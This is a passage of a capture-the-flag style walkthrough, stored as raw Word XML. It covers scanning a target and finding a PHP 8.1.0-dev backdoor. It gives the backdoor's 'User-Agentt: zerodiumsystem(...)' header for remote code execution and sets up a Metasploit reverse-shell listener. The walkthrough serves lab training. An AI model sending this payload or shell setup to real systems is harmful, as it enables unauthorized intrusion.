        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD732C">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> creating a workspace named knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E079BB" w14:textId="77777777" w:rsidR="00480FF3" w:rsidRPr="001F4F39" w:rsidRDefault="00480FF3" w:rsidP="001F4F39">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B917E9" w14:textId="22993009" w:rsidR="00032849" w:rsidRPr="00032849" w:rsidRDefault="00A13CD2" w:rsidP="00032849">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc74569234"/>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="66CA0A17" w14:textId="4F7700CE" w:rsidR="00AE78DC" w:rsidRDefault="00491493" w:rsidP="0016310C">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00E63E3F">
        <w:t>arry out a port scan on the target machine</w:t>
      </w:r>
      <w:r w:rsidR="00135FFE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38000B2B" w14:textId="77777777" w:rsidR="00135FFE" w:rsidRDefault="00135FFE" w:rsidP="0016310C"/>
    <w:p w14:paraId="62EE0CFB" w14:textId="325BC164" w:rsidR="00051ADC" w:rsidRDefault="00780901" w:rsidP="00493C41">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00493C41" w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>b_</w:t>
      </w:r>
      <w:r w:rsidR="00414137" w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0010039C" w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">map </w:t>
      </w:r>
      <w:r w:rsidR="0021077A" w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">-sC </w:t>
      </w:r>
      <w:r w:rsidR="0010039C" w:rsidRPr="001D0DDD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">-sV </w:t>
      </w:r>
      <w:r w:rsidR="00DB0985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00536710">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="00DB0985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E515859" w14:textId="77777777" w:rsidR="00135FFE" w:rsidRPr="001D0DDD" w:rsidRDefault="00135FFE" w:rsidP="00493C41">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291C8AE6" w14:textId="56D33FE9" w:rsidR="001F4524" w:rsidRDefault="001F4524" w:rsidP="00F43390">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43390">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap </w:t>
      </w:r>
      <w:r w:rsidR="00055BDB">
        <w:t xml:space="preserve">as opposed to </w:t>
      </w:r>
      <w:r w:rsidR="00B901F5" w:rsidRPr="00F43390">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="005E1189" w:rsidRPr="00055BDB">
        <w:t>ensures</w:t>
      </w:r>
      <w:r w:rsidR="005E1189" w:rsidRPr="00F43390">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the data is saved to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD198E2" w14:textId="6F4B0DE7" w:rsidR="00FD536E" w:rsidRPr="00872C95" w:rsidRDefault="00400C13" w:rsidP="00F43390">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43390">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-sC</w:t>
      </w:r>
      <w:r w:rsidR="005E1189">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00872C95">
        <w:t>loads commonly used nmap scripts</w:t>
      </w:r>
      <w:r w:rsidR="00A91D23" w:rsidRPr="00872C95">
        <w:t xml:space="preserve"> and utilizes </w:t>
      </w:r>
      <w:r w:rsidR="000B7327" w:rsidRPr="00872C95">
        <w:t>the nmap script engine (NSE)</w:t>
      </w:r>
      <w:r w:rsidR="00F075BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD4421" w14:textId="3AC990D5" w:rsidR="00A13CD2" w:rsidRDefault="00F80221" w:rsidP="00F43390">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43390">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r w:rsidR="005E1189">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F075BB">
        <w:t xml:space="preserve">attempts to </w:t>
      </w:r>
      <w:r w:rsidRPr="009765B8">
        <w:t>detect the service and version running on a</w:t>
      </w:r>
      <w:r w:rsidR="00F075BB">
        <w:t>n open</w:t>
      </w:r>
      <w:r w:rsidRPr="009765B8">
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="00F075BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63D56C" w14:textId="002243F9" w:rsidR="001A2EE2" w:rsidRDefault="001A2EE2" w:rsidP="006D0DC6"/>
    <w:p w14:paraId="3DA79232" w14:textId="77777777" w:rsidR="007A2402" w:rsidRDefault="00271BB5" w:rsidP="007A2402">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00271BB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C8DA08A" wp14:editId="22CFDCD5">
            <wp:extent cx="5731510" cy="19011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10512" w14:textId="6348F6EF" w:rsidR="003B7333" w:rsidRDefault="007A2402" w:rsidP="007A2402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2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> shows the output from the nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF85FB" w14:textId="77777777" w:rsidR="00DB0985" w:rsidRDefault="00DB0985" w:rsidP="00413201"/>
    <w:p w14:paraId="6F2B1D44" w14:textId="7051858D" w:rsidR="00413201" w:rsidRDefault="00413201" w:rsidP="00413201">
      <w:r>
        <w:t xml:space="preserve">The scan shows there are two </w:t>
      </w:r>
      <w:r w:rsidR="009173DA">
        <w:t>open ports</w:t>
      </w:r>
      <w:r w:rsidR="00BA27AE">
        <w:t>. Port 22 is a secure shell service</w:t>
      </w:r>
      <w:r w:rsidR="003A1421">
        <w:t xml:space="preserve"> (OpenSSH 8.2p1)</w:t>
      </w:r>
      <w:r w:rsidR="00CF621B">
        <w:t xml:space="preserve"> and port 80 is </w:t>
      </w:r>
      <w:r w:rsidR="001C1C90">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0090303D">
        <w:t>HTTP server (Apache 2.4</w:t>
      </w:r>
      <w:r w:rsidR="009F621E">
        <w:t xml:space="preserve">.41). The operating system appears to be </w:t>
      </w:r>
      <w:r w:rsidR="00923F14">
        <w:t>Ubuntu,</w:t>
      </w:r>
      <w:r w:rsidR="009F621E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA62DF">
        <w:t>but</w:t>
      </w:r>
      <w:r w:rsidR="009F621E">
        <w:t xml:space="preserve"> no version is specified</w:t>
      </w:r>
      <w:r w:rsidR="00DA62DF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A418CB" w14:textId="6B108D36" w:rsidR="00923F14" w:rsidRDefault="007D2766" w:rsidP="00413201">
      <w:r>
        <w:t xml:space="preserve">There was </w:t>
      </w:r>
      <w:r w:rsidR="003135A1">
        <w:t xml:space="preserve">a vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="003F5F31">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007F3E42">
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="003F5F31" w:rsidRPr="003F2EB0">
        <w:t>-2021-28041</w:t>
      </w:r>
      <w:r w:rsidR="003F5F31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="5A5A5A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="003135A1">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00EB3104">
        <w:t xml:space="preserve">OpenSSH 8.2p1 </w:t>
      </w:r>
      <w:r w:rsidR="00EE5FA9">
        <w:t>(NIST, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="00634A02">
        <w:t xml:space="preserve"> although a patch was </w:t>
      </w:r>
      <w:r w:rsidR="00F02E10">
        <w:t>released,</w:t>
      </w:r>
      <w:r w:rsidR="00634A02">
        <w:t xml:space="preserve"> and this system is </w:t>
      </w:r>
      <w:r w:rsidR="00A12D6F">
        <w:t>patched.</w:t>
      </w:r>
      <w:r w:rsidR="00A37B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A12D6F">
        <w:t>The SSH server</w:t>
      </w:r>
      <w:r w:rsidR="00A37B5E">
        <w:t xml:space="preserve"> requires a </w:t>
      </w:r>
      <w:r w:rsidR="007C2C5E">
        <w:t>private key to log in</w:t>
      </w:r>
      <w:r w:rsidR="00A12D6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0015612C">
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r w:rsidR="002F0276">
        <w:t>brute forcing</w:t>
      </w:r>
      <w:r w:rsidR="0015612C">
        <w:t xml:space="preserve"> is not practical</w:t>
      </w:r>
      <w:r w:rsidR="002C7F0B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008C6FFD">
        <w:t>Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="002C7F0B">
        <w:t xml:space="preserve"> the focus here will be on further enumerating the Apache web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248ACD6" w14:textId="10100A07" w:rsidR="00C73BB6" w:rsidRDefault="00B567CA" w:rsidP="00413201">
      <w:r>
        <w:t xml:space="preserve">Inside the Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="009173DA">
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> enter the following command</w:t>
      </w:r>
      <w:r w:rsidR="00F56F1E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F31023" w14:textId="0BBEFDE9" w:rsidR="00B567CA" w:rsidRDefault="00B567CA" w:rsidP="00413201"/>
    <w:p w14:paraId="391F9C67" w14:textId="49910611" w:rsidR="00B567CA" w:rsidRDefault="00B567CA" w:rsidP="00A44D64">
      <w:pPr>
        <w:ind w:firstLine="720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 xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="00A44D64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/http/http_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA28AA6" w14:textId="3FFE9E32" w:rsidR="00F56F1E" w:rsidRDefault="00E960F7" w:rsidP="00A44D64">
      <w:pPr>
        <w:ind w:firstLine="720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>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821D8A7" w14:textId="7215545E" w:rsidR="004E0155" w:rsidRDefault="00E960F7" w:rsidP="00A44D64">
      <w:pPr>
        <w:ind w:firstLine="720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lastRenderedPageBreak/>
        <w:t xml:space="preserve">set rhosts </w:t>
      </w:r>
      <w:r w:rsidR="001963A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00536710">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="001963A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_ip</w:t>
      </w:r>
      <w:r w:rsidR="004E0155">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607C8A5" w14:textId="1AD1F73F" w:rsidR="00E960F7" w:rsidRDefault="004E0155" w:rsidP="00A44D64">
      <w:pPr>
        <w:ind w:firstLine="720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>set rport 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A163B75" w14:textId="5188742E" w:rsidR="00CA331C" w:rsidRDefault="00C64843" w:rsidP="000C04B2">
      <w:pPr>
        <w:ind w:firstLine="720"/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>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDFB59" w14:textId="77777777" w:rsidR="007149EE" w:rsidRDefault="007149EE" w:rsidP="000C04B2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370B3115" w14:textId="39F82C99" w:rsidR="00CA331C" w:rsidRPr="005E3148" w:rsidRDefault="005E3148" w:rsidP="00CA331C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The other options will be set by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50068FBB" w14:textId="77777777" w:rsidR="00505A1B" w:rsidRDefault="00DB0985" w:rsidP="00505A1B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00DB0985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573C0EE5" wp14:editId="3AB278B4">
            <wp:extent cx="5731510" cy="2189480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EC720" w14:textId="69EC7D53" w:rsidR="00132656" w:rsidRDefault="00505A1B" w:rsidP="00505A1B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3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> output from the http_version auxiliary module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414EB02" w14:textId="77777777" w:rsidR="007149EE" w:rsidRPr="007149EE" w:rsidRDefault="007149EE" w:rsidP="007149EE"/>
    <w:p w14:paraId="339C9DF6" w14:textId="5B0799FF" w:rsidR="00505A1B" w:rsidRDefault="001A4157" w:rsidP="00505A1B">
      <w:r>
        <w:t>The output from the module has given a little more information about the server.</w:t>
      </w:r>
      <w:r w:rsidR="00A163E7">
        <w:t xml:space="preserve"> It appears to be running PHP version 8.</w:t>
      </w:r>
      <w:r w:rsidR="004D5570">
        <w:t xml:space="preserve">1.0-dev. </w:t>
      </w:r>
      <w:r w:rsidR="000C35F8">
        <w:t>This looks a bit unusual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23681B86" w14:textId="044E7F56" w:rsidR="007E7E5E" w:rsidRDefault="00211619" w:rsidP="00505A1B">
      <w:r>
        <w:t>Following a search on Google</w:t>
      </w:r>
      <w:r w:rsidR="002F095C">
        <w:t xml:space="preserve"> it appears t</w:t>
      </w:r>
      <w:r w:rsidR="004F79BE">
        <w:t>his version of PHP has a backdoor that allows remote code execution</w:t>
      </w:r>
      <w:r w:rsidR="003C747C">
        <w:t xml:space="preserve"> (RCE) on the server</w:t>
      </w:r>
      <w:r w:rsidR="00702060">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00361E83">
        <w:t>(Goodin, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="003C747C">
        <w:t xml:space="preserve">. This is achieved by adding an extra header </w:t>
      </w:r>
      <w:r w:rsidR="005A0CBE">
        <w:t>to a HTTP request with the key: value</w:t>
      </w:r>
      <w:r w:rsidR="00C632B7">
        <w:t xml:space="preserve"> pair</w:t>
      </w:r>
      <w:r w:rsidR="00F465F1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111FDFB" w14:textId="77777777" w:rsidR="007E7E5E" w:rsidRDefault="007E7E5E" w:rsidP="00505A1B"/>
    <w:p w14:paraId="4DABA03B" w14:textId="53BA87AE" w:rsidR="006D6967" w:rsidRPr="007E7E5E" w:rsidRDefault="00C632B7" w:rsidP="00505A1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E7E5E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00105E62">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Agentt: zerodiumsystem</w:t>
      </w:r>
      <w:r w:rsidR="00B9552D" w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(‘Enter system command here’);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851060B" w14:textId="77777777" w:rsidR="00957466" w:rsidRPr="00413201" w:rsidRDefault="00957466" w:rsidP="00413201"/>
    <w:p w14:paraId="3108391D" w14:textId="59087484" w:rsidR="00174558" w:rsidRDefault="000174AC" w:rsidP="00174558">
      <w:r>
        <w:t xml:space="preserve">Notice the double </w:t>
      </w:r>
      <w:r w:rsidR="006566FA">
        <w:t xml:space="preserve">‘t’ in ‘Agentt’ this is an additional header and should not replace the </w:t>
      </w:r>
      <w:r w:rsidR="00710202">
        <w:t>original ‘User Agent’ header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346ADDC5" w14:textId="02CAA50A" w:rsidR="00727CA7" w:rsidRDefault="00727CA7" w:rsidP="00174558"/>
    <w:p w14:paraId="2BB75660" w14:textId="46917887" w:rsidR="00032849" w:rsidRPr="00032849" w:rsidRDefault="005F38C6" w:rsidP="00032849">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc74569235"/>
      <w:r>
        <w:t>Gaining a foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="181F53FA" w14:textId="62AC0AA0" w:rsidR="00940C98" w:rsidRDefault="00DA3B18" w:rsidP="00174558">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00061DA0">
        <w:t>ith the information gathered a</w:t>
      </w:r>
      <w:r w:rsidR="00F61DA6">
        <w:t>nd a</w:t>
      </w:r>
      <w:r w:rsidR="00061DA0">
        <w:t xml:space="preserve"> known </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerability in the PHP version it is time </w:t>
      </w:r>
      <w:r w:rsidR="00CB0032">
        <w:t>to gain access to the system</w:t>
      </w:r>
      <w:r w:rsidR="00F61DA6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F6D82A" w14:textId="25DE7810" w:rsidR="00F61DA6" w:rsidRDefault="00F61DA6" w:rsidP="00174558">
      <w:r>
        <w:t>Inside the Metasploit shell</w:t>
      </w:r>
      <w:r w:rsidR="00F2757D">
        <w:t xml:space="preserve"> use the multi/handler module. This module listens for incoming connections to the system and handles them </w:t>
      </w:r>
      <w:r w:rsidR="004F434F">
        <w:t>appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0CA63" w14:textId="33512A3B" w:rsidR="004F434F" w:rsidRDefault="004F434F" w:rsidP="00174558"/>
    <w:p w14:paraId="4BCDF359" w14:textId="54E4993E" w:rsidR="004F434F" w:rsidRDefault="004F434F" w:rsidP="00174558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ab/>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36955A8D" w14:textId="57CFA000" w:rsidR="00D70BA0" w:rsidRDefault="00EB689B" w:rsidP="00174558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ab/>
      </w:r>
      <w:r w:rsidR="00D204C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9FB47" w14:textId="2D470283" w:rsidR="00111D30" w:rsidRDefault="0006559C" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">set lhost </w:t>
      </w:r>
      <w:r w:rsidR="000C09D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18381E81" w14:textId="77777777" w:rsidR="00FD7780" w:rsidRDefault="00FD7780" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E661F6C" w14:textId="265B5868" w:rsidR="000C09D3" w:rsidRDefault="00055D7E" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The default port is set to 4444. This is fine</w:t>
      </w:r>
      <w:r w:rsidR="00815E72">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it </w:t>
      </w:r>
      <w:r w:rsidR="006A0D63">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is,</w:t>
      </w:r>
      <w:r w:rsidR="00815E72">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you can </w:t>
      </w:r>
      <w:r w:rsidR="00EA5FE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">set lport &lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00815E72">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>to your preferred port.</w:t>
      </w:r>
      <w:r w:rsidR="00EE6EC5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="006C2EE5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">payload is set to the default </w:t>
      </w:r>
      <w:r w:rsidR="006C2EE5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>generic/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00461839">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. In this example this will be fine</w:t>
      </w:r>
      <w:r w:rsidR="004C6C71">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. Now start the listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16781DFC" w14:textId="71F5131F" w:rsidR="004C6C71" w:rsidRDefault="004C6C71" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB7888" w14:textId="58BC3149" w:rsidR="004C6C71" w:rsidRDefault="004C6C71" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB98A2" w14:textId="77777777" w:rsidR="00354529" w:rsidRDefault="00354529" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
